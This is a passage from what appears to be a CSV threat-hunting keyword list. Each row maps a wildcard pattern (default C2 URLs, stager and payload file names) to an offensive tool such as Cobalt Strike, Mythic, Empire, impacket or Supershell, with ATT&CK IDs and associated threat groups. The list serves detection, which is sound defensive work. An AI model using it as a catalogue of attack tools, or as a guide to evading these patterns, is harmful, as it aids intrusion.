- TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://127.0.0.1:8000/1.jpg*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" +"*http://127.0.0.1:8000/gate.html*","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://127.0.0.1:8081*","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*http://LhOsT/FiLNaMe.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*http://localhost:58082/broadcast?id=*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://tarantula.by.ru/localroot/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*http://vpsip:28888*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_malleable.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http1.x64.bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*http1.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*HTTPAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*httpattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httpattack.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*httpattack.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 